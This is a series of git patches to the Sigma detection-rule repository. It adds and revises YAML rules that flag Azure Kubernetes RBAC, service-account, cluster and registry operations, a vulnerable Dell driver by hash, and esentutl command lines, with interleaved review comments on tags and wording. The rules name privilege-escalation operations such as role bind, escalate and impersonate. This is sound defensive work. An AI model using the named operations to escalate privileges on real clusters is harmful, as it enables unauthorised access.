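            if not doc:  # empty YAML document
                continue
            d.update((k, v) for k, v in doc.items() if k in fields)
    row = [d.get("title", ""), d.get("description", ""), d.get("level", ""), d.get("author", "")]
    attack_tags = [tag for tag in d.get("tags", []) if "attack" in tag]  # Only output attack related tags
    if args.oneline:  # All tags will be on a single line
        if "tags" in d:
            row.append(args.delimiter.join(attack_tags))
        writer.writerow(row)
    else:
        for tag in attack_tags:
            writer.writerow(row + [tag])
```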
@@ -68,7 +68,7 @@ class ElasticsearchWildcardHandlingMixin(object): ("case_insensitive_whitelist", None, "Fields to make the values case insensitive regex. Automatically sets the field as a keyword. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("case_insensitive_blacklist", None, "Fields to exclude from being made into case insensitive regex. Valid options are: list of fields, single field. Also, wildcards * and ? allowed.", None), ("wildcard_use_keyword", "true", "Use analyzed field or wildcard field if the query uses a wildcard value (ie: '*mall_wear.exe'). Set this to 'False' to use analyzed field or wildcard field. Valid options are: true/false", None), - ("hash_normalise", None, "Normalise hash field to lower , upper or both. If not use field is a normal field. Valid options are: lower/upper/both", None), + ("hash_normalize", None, "Normalize hash fields to lowercase, uppercase or both. If this option is not used the field value stays untouched. Valid options are: lower/upper/both (default: both)", None), ) reContainsWildcard = re.compile("(?:(? Date: Sat, 7 Aug 2021 11:22:44 +0200 Subject: [PATCH 0208/1367] fix: more changes to incomplete windivert rule --- rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml | 3 --- ...l_driver_load copy.yml => sysmon_windivert_driver_load.yml} | 0 2 files changed, 3 deletions(-) rename rules/windows/driver_load/{sysmon_vuln_dell_driver_load copy.yml => sysmon_windivert_driver_load.yml} (100%) diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml index 39517aa8..21868b8a 100644 --- a/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml +++ b/rules/windows/driver_load/sysmon_vuln_dell_driver_load.yml 
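Review bot: Renaming the backend option key from `hash_normalise` to `hash_normalize` silently breaks every existing sigmac invocation or config that passes the old spelling, and nothing in this hunk keeps the old name working; wherever the option is read (not visible here, only one of the commit's four changed lines is in this chunk), accepting `hash_normalise` as a deprecated alias, or at least warning when it is seen, would avoid that surprise. The new help text is also inconsistent with itself: it says the field value stays untouched when the option is not used and in the same sentence gives `(default: both)`, while the tuple's default value is `None`; say which of the two is true, e.g. whether `both` applies when the option is given without a value.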
@@ -21,9 +21,6 @@ detection: - 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1' - '10b30bdee43b3a2ec4aa63375577ade650269d25' - 'd2fd132ab7bbc6bbb87a84f026fa0244' - - - condition: selection_image or selection_hash falsepositives: - legitimate BIOS driver updates (should be rare) diff --git a/rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml b/rules/windows/driver_load/sysmon_windivert_driver_load.yml similarity index 100% rename from rules/windows/driver_load/sysmon_vuln_dell_driver_load copy.yml rename to rules/windows/driver_load/sysmon_windivert_driver_load.yml From 4c3a7007e682ea00673972e85755b7c68bab5993 Mon Sep 17 00:00:00 2001 From: Lei Chen Date: Sat, 7 Aug 2021 21:13:19 +0800 Subject: [PATCH 0209/1367] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3fb50937..864235a6 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -[![sigma build sttaus](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master)](https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster) +[![sigma build status](https://github.com/SigmaHQ/sigma/actions/workflows/sigma-test.yml/badge.svg?branch=master)](https://github.com/SigmaHQ/sigma/actions?query=branch%3Amaster) ![sigma_logo](./images/Sigma_0.3.png) From 07d21c58e823b7c99fa8bb159228a7bda42476b2 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 7 Aug 2021 15:49:25 +0200 Subject: [PATCH 0210/1367] Update process_susp_esentutl_params.yaml --- .../windows/process_creation/process_susp_esentutl_params.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_susp_esentutl_params.yaml b/rules/windows/process_creation/process_susp_esentutl_params.yaml index 598525ac..9dbe74ab 100644 --- a/rules/windows/process_creation/process_susp_esentutl_params.yaml 
+++ b/rules/windows/process_creation/process_susp_esentutl_params.yaml @@ -20,7 +20,7 @@ detection: CommandLine|contains|all: - 'esentutl' - ' /p' - condition: all of them + condition: selection falsepositives: - To be determined level: medium From f75f8fababcae40c876161c792af1fa9587caa6d Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 7 Aug 2021 15:54:43 +0200 Subject: [PATCH 0211/1367] fix file name --- ...susp_esentutl_params.yaml => process_susp_esentutl_params.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{process_susp_esentutl_params.yaml => process_susp_esentutl_params.yml} (100%) diff --git a/rules/windows/process_creation/process_susp_esentutl_params.yaml b/rules/windows/process_creation/process_susp_esentutl_params.yml similarity index 100% rename from rules/windows/process_creation/process_susp_esentutl_params.yaml rename to rules/windows/process_creation/process_susp_esentutl_params.yml From 39aaf04598375405f4b07b7c4412683b7e92aeb3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 13:05:19 -0500 Subject: [PATCH 0212/1367] Create azure_kubernetes_clusterrolebinding_modified_or_deleted.yml --- ...clusterrolebinding_modified_or_deleted.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml new file mode 100644 index 00000000..d0bac397 --- /dev/null +++ b/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml 
@@ -0,0 +1,25 @@ +title: Azure Kubernetes ClusterRoleBinding Modified and Deleted +id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 +description: Detects the creation or patching of potential malicious ClusterRoleBinding. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + + From ad9284e771c3e7f881a3d6d5738ae262f4209fcd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 15:30:10 -0500 Subject: [PATCH 0213/1367] Update and rename azure_kubernetes_clusterrolebinding_modified_or_deleted.yml to azure_kubernetes_rolebinding_modified_or_deleted.yml --- ... azure_kubernetes_rolebinding_modified_or_deleted.yml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename rules/cloud/{azure_kubernetes_clusterrolebinding_modified_or_deleted.yml => azure_kubernetes_rolebinding_modified_or_deleted.yml} (50%) 
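Review bot: The description says `creation or patching` but the rule also lists `CLUSTERROLEBINDINGS/DELETE`, and `CLUSTERROLEBINDINGS/WRITE` covers create and update alike, so the description should read `Detects the creation, modification or deletion of a ClusterRoleBinding`. The three empty `+` lines at the end of the file should go; a rule file should end after the last `falsepositives` entry.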
diff --git a/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml similarity index 50% rename from rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml rename to rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml index d0bac397..67de51ff 100644 --- a/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -1,6 +1,6 @@ -title: Azure Kubernetes ClusterRoleBinding Modified and Deleted +title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 -description: Detects the creation or patching of potential malicious ClusterRoleBinding. +description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. author: Austin Songer status: experimental date: 2021/08/07 
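Review bot: The new title says `Modified and Deleted` while the filename says `modified_or_deleted`, and a single activity-log event is one or the other; `title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified or Deleted` matches both the filename and the event semantics. The rewritten description still only mentions `creation or patching` although the rule fires on the DELETE operations as well.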
@@ -13,13 +13,15 @@ detection: properties.message: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE condition: selection level: medium tags: - attack.impact - attack.credential_access falsepositives: - - ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From fb88fe58bc9ea3ec4cb124889bda955ffabeb49d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 22:18:28 -0500 Subject: [PATCH 0214/1367] Create azure_kubernetes_cluster_created_or_deleted.yml --- ..._kubernetes_cluster_created_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml new file mode 100644 index 00000000..4264a428 --- /dev/null +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml 
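Review bot: The tags kept as context here, `attack.impact` and `attack.credential_access`, do not describe what a RoleBinding/ClusterRoleBinding change is: binding a subject to a role grants or revokes permissions, which is privilege escalation and, for bindings that survive a cleanup, persistence; `attack.privilege_escalation` and `attack.persistence` are the matching tactic tags. With the RoleBinding operations added the rule's scope changed after creation, so a `modified: 2021/08/07` line after `date:` (the Sigma convention for a changed rule) would make that visible to consumers keyed on the unchanged `id`.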
@@ -0,0 +1,24 @@ +title: Azure Kubernetes Cluster Created or Deleted +id: 9541f321-7cba-4b43-80fc-fbd1fb922808 +description: Detects when a Azure Kubernetes Cluster is created or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + + From a6f57b462a6fe6f8745e40efc91e1e01ce1acc4f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 22:58:11 -0500 Subject: [PATCH 0215/1367] Create azure_container_registry_created_or_deleted.yml --- ..._container_registry_created_or_deleted.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure_container_registry_created_or_deleted.yml diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure_container_registry_created_or_deleted.yml new file mode 100644 index 00000000..0bf949a2 --- /dev/null +++ b/rules/cloud/azure_container_registry_created_or_deleted.yml 
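Review bot: `MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE` and `.../DELETE` belong to the Microsoft.Kubernetes resource provider, i.e. Azure Arc-enabled Kubernetes (clusters connected to Azure from elsewhere); AKS clusters are created and deleted under `MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/WRITE` and `.../DELETE`, which this rule does not list. Either retitle to `Azure Arc Kubernetes Cluster Connected or Deleted` or add the ContainerService operations if AKS is the intended target, and say so in the description. `WRITE` is also emitted for any update of the resource, not only creation, so `created, updated or deleted` is the honest wording. The trailing empty `+` lines are removed by a later commit in this series.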
@@ -0,0 +1,21 @@ +title: Azure Container Registry Created or Deleted +id: 93e0ef48-37c8-49ed-a02c-038aab23628e +description: Detects when a Container Registry is created or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 98f4b4091495a741587bb34fcc2c1bf53a24b67b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 23:01:27 -0500 Subject: [PATCH 0216/1367] Create azure_kubernetes_service_account_modified_or_deleted.yml --- ...es_service_account_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml new file mode 100644 index 00000000..0c44f839 --- /dev/null +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml 
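Review bot: `MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE` is emitted for every update of a registry, not only its creation, and the updates are where the interesting changes live (properties such as the admin user or network rules are changed through the same write), so a title and description of `Created or Deleted` undersell what the rule fires on; describe it as `created, updated or deleted`, or give the update case its own rule with a higher level. The reference points at the top of the resource-provider-operations page; `#microsoftcontainerregistry` would take the reader to the relevant section, as the sibling Kubernetes rules do with `#microsoftkubernetes`.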
@@ -0,0 +1,22 @@ +title: Azure Kubernetes Service Account Modified or Deleted +id: 3ef887ae-8664-45c9-9a06-70575ee49d7f +description: Identifies when a service account is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 441d6a19f5c55b84613b6c099fc781887f5fb4d4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 23:01:46 -0500 Subject: [PATCH 0217/1367] Delete azure_kubernetes_service_account_modified_or_deleted.yml --- ...es_service_account_modified_or_deleted.yml | 22 ------------------- 1 file changed, 22 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml deleted file mode 100644 index 0c44f839..00000000 --- a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml +++ /dev/null 
@@ -1,22 +0,0 @@ -title: Azure Kubernetes Service Account Modified or Deleted -id: 3ef887ae-8664-45c9-9a06-70575ee49d7f -description: Identifies when a service account is modified or deleted. -author: Austin Songer -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ed542fb931c4b7486dc2bb02ae7fa89568864b54 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 23:02:25 -0500 Subject: [PATCH 0218/1367] Create azure_kubernetes_service_account_modified_or_deleted.yml --- ...es_service_account_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml new file mode 100644 index 00000000..ddae4ee5 --- /dev/null +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml 
@@ -0,0 +1,22 @@ +title: Azure Kubernetes Service Account Modified or Deleted +id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 +description: Identifies when a service account is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 1f9b2a915c6e46436eb7e627046202922ea9c4a8 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 8 Aug 2021 07:05:11 +0200 Subject: [PATCH 0219/1367] fix too many empty line --- rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml index 4264a428..be97bf7b 100644 --- a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml 
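Review bot: `MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION` is not a modification or deletion: it records a caller acting as a service account, which is an identity-abuse signal that deserves its own rule (with a level above medium) or at least a description that says the rule also fires on impersonation, e.g. `Identifies when a service account is modified, deleted or impersonated`. As written, an analyst reading the title will misread an impersonate hit as a config change. `attack.impact` also fits neither case; `attack.privilege_escalation` for impersonation and `attack.persistence` for service-account changes are the closer tactic tags. The `id` differs from the version of this file deleted earlier in the series; if that was deliberate (collision), fine, otherwise ids should stay stable.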
@@ -19,6 +19,4 @@ tags: - attack.impact falsepositives: - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - - - + From fd8bd68479c3d512dea9a64446c26e2371aaac20 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 00:59:35 -0500 Subject: [PATCH 0220/1367] Create azure_kubernetes_sensitive_role_access.yml --- ...azure_kubernetes_sensitive_role_access.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_sensitive_role_access.yml diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_sensitive_role_access.yml new file mode 100644 index 00000000..c8f7f572 --- /dev/null +++ b/rules/cloud/azure_kubernetes_sensitive_role_access.yml 
@@ -0,0 +1,28 @@ +title: Azure Kubernetes Sensitive Role Access +id: +description: Identifies when ClusterRoles/Roles are being modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 4ea6d47fcbb2f3a5a75c47436ba4a30d32d564d6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:00:25 -0500 Subject: [PATCH 0221/1367] Update azure_kubernetes_sensitive_role_access.yml --- rules/cloud/azure_kubernetes_sensitive_role_access.yml | 1 - 1 file changed, 1 deletion(-) 
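Review bot: The description says `modified or deleted`, but half of the list is `ROLES/BIND/ACTION`, `ROLES/ESCALATE/ACTION` and their ClusterRole equivalents, which correspond to the Kubernetes RBAC `bind` and `escalate` verbs that let a subject grant permissions it does not itself hold; these are the privilege-escalation primitives of RBAC and should be named, e.g. `Identifies when ClusterRoles/Roles are created, modified, deleted, bound or escalated`. The title `Sensitive Role Access` suggests reads, while every listed operation is a write or a privileged action; `Sensitive Role Modification` would match the content.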
diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_sensitive_role_access.yml index c8f7f572..557971a4 100644 --- a/rules/cloud/azure_kubernetes_sensitive_role_access.yml +++ b/rules/cloud/azure_kubernetes_sensitive_role_access.yml @@ -23,6 +23,5 @@ detection: level: medium tags: - attack.impact - - attack.credential_access falsepositives: - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 44cddffa800ef9fb35132c24ecde4bf42bc6e9bb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:10:27 -0500 Subject: [PATCH 0222/1367] Update azure_kubernetes_sensitive_role_access.yml --- rules/cloud/azure_kubernetes_sensitive_role_access.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_sensitive_role_access.yml index 557971a4..2a6dab4d 100644 --- a/rules/cloud/azure_kubernetes_sensitive_role_access.yml +++ b/rules/cloud/azure_kubernetes_sensitive_role_access.yml @@ -1,5 +1,5 @@ title: Azure Kubernetes Sensitive Role Access -id: +id: 818fee0c-e0ec-4e45-824e-83e4817b0887 description: Identifies when ClusterRoles/Roles are being modified or deleted. author: Austin Songer status: experimental From 3e914d5bf5e858b50dabc08c3154f22490b5d7ff Mon Sep 17 00:00:00 2001 
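Review bot: After dropping `attack.credential_access` the rule is left with only `attack.impact`, but creating, binding or escalating roles is how an attacker gains or keeps permissions, not how they destroy something; `attack.privilege_escalation` (and `attack.persistence` for the bind/escalate cases) are the matching tactic tags. The same mis-tagging exists in the rolebinding rule added earlier in this series.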
From: Austin Songer Date: Sun, 8 Aug 2021 01:10:53 -0500 Subject: [PATCH 0223/1367] Rename azure_kubernetes_sensitive_role_access.yml to azure_kubernetes_role_access.yml --- ...sensitive_role_access.yml => azure_kubernetes_role_access.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{azure_kubernetes_sensitive_role_access.yml => azure_kubernetes_role_access.yml} (100%) diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_role_access.yml similarity index 100% rename from rules/cloud/azure_kubernetes_sensitive_role_access.yml rename to rules/cloud/azure_kubernetes_role_access.yml From 357ca31382f7a0a690d13e57d754f53d3fbc9a72 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:15:23 -0500 Subject: [PATCH 0224/1367] Create azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml new file mode 100644 index 00000000..94dde701 --- /dev/null +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml 
@@ -0,0 +1,23 @@ +title: Azure Kubernetes Network Policy Change +id: 51d93227-8168-4907-8fb1-ffde5b654985 +description: Identifies when a Azure Kubernetes network policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d46f0a870e133a4776b9dad03e152fff3dc8a7a2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:15:55 -0500 Subject: [PATCH 0225/1367] Delete azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml deleted file mode 100644 index 94dde701..00000000 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ /dev/null 
